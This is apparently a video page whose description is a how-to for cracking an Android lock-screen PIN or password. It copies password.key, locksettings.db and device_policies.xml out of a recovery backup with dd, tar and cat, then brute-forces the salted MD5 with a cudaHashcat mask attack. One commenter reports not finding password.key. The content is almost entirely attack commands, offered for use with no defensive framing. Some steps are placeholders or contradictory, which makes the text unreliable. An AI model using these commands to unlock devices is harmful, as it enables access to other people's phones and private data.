How to Hack Android PIN/PASSWORD with oclHashcat/cudaHashcat (linux/mac unrooted device)


Author: NobusHK
1096 View
8m 57s Lenght
9 Rating


1. Reset your Android device in Recovery Mode. 2. Create backup user data from Recovery Mode (an SD card is required to create a file similar with: userdata_xxxx_xxxxxx.backup). Target files ========================================­=== /data/system/password.key /data/system/locksettings.db /data/system/device_policies.xml Command used: cd ~/Desktop dd if=userdata_xxxx_xxxxxx.backup bs=512 skip=1 of=backup.tar.gz mkdir backup tar -xvf backup.tar.gz -C ~/Desktop/backup cat ~/Desktop/backup/system/password.key | tr '[:upper:]' '[:lower:]' | tail -c 32 cat ~/Desktop/backup/system/locksettings.db cat ~/Desktop/backup/system/locksettings.db-wal printf “%016x” salt key cat ~/Desktop/backup/system/device_policies.xml ./cudaHashcat64.bin -a 3 -n 80 -u 1024 -m 10 md5:salt -i --increment-min=Length --increment-max=Length -1 ?l ?1*Length


Comments

  1. I cant find password.key (s6 edge 6.0.1 marshmallow)